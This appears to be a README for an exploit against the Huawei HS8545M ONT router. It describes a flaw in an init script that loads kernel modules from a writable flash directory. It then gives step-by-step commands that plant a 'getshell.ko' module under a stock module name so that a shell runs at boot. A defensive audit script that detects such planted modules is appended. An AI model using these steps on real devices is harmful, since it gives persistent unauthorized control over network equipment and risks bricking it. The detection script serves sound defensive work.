Exploit-HS8545M-ONT
Exploit for the Huawei ONT device. Only r019 is supported; for r018 or r017 you need to compile the getshell.ko kernel module yourself.
Note
This may brick your ONT device; use at your own risk!
Usage
Find an exploit to load a user-defined ko module
The exploit is in /etc/rc.d/rc.start/1.sdk_init.sh: it uses a kernel module (.ko) to run the shell script /mnt/jffs2/hw/getshell.sh when the system reboots.
The logic flaw is in lines 200-206:
# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
    cd /mnt/jffs2/TranStar/
    echo "Loading the Temp HISI SD511X modules: "
else
    cd /lib/modules/hisi_sdk
    echo "Loading the HISI SD511X modules: "
fi
If /mnt/jffs2/TranStar/hi_sysctl.ko exists, the script executes cd /mnt/jffs2/TranStar/. That means the working directory is now /mnt/jffs2/TranStar/, and /mnt/jffs2/TranStar/ is writable.
So:
mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/
In order to execute lines 261-262, change the following in /mnt/jffs2/hw_boardinfo:
obj.id = "0x00000001" ; obj.value = "4";
Upload the getshell.ko module (compiled by 0neday; only r019 is supported):
# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko
# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko
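
A defender-side check for the condition described above, as an added example that is not part of the original repository: it audits a device or an extracted root filesystem for a /mnt/jffs2/TranStar/ override directory and reports modules that differ from /lib/modules/hisi_sdk. The function name, its return codes and the ROOT argument are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a mounted or extracted ONT filesystem for the writable
# module-override directory that 1.sdk_init.sh prefers over the stock modules.
# ROOT is an assumption: "/" on the device, or the path of an extracted image.

OVERRIDE_DIR=mnt/jffs2/TranStar    # writable directory the init script cd's into
TRUSTED_DIR=lib/modules/hisi_sdk   # directory used when the override is absent
TRIGGER=hi_sysctl.ko               # file whose presence activates the override

# audit_module_override ROOT
# Prints one finding per line. Returns:
#   0 = nothing to report
#   1 = override is active, but every module matches its stock copy
#   2 = override directory holds changed or extra modules
audit_module_override() {
    root=${1:-/}
    odir="$root/$OVERRIDE_DIR"
    tdir="$root/$TRUSTED_DIR"
    result=0

    [ -d "$odir" ] || { echo "OK: $OVERRIDE_DIR not present"; return 0; }

    if [ -f "$odir/$TRIGGER" ]; then
        echo "WARN: $OVERRIDE_DIR/$TRIGGER exists, modules load from writable flash"
        result=1
    fi

    for mod in "$odir"/*.ko; do
        [ -f "$mod" ] || continue          # glob matched nothing
        name=$(basename "$mod")
        if [ ! -f "$tdir/$name" ]; then
            echo "ALERT: $name has no stock counterpart in $TRUSTED_DIR"
            result=2
        elif ! cmp -s "$mod" "$tdir/$name"; then
            echo "ALERT: $name differs from $TRUSTED_DIR/$name"
            result=2
        fi
    done
    return $result
}
# Example call: audit_module_override /path/to/extracted/rootfs
```

A byte comparison against the stock directory is only meaningful if the stock directory itself is on read-only storage or has been verified separately.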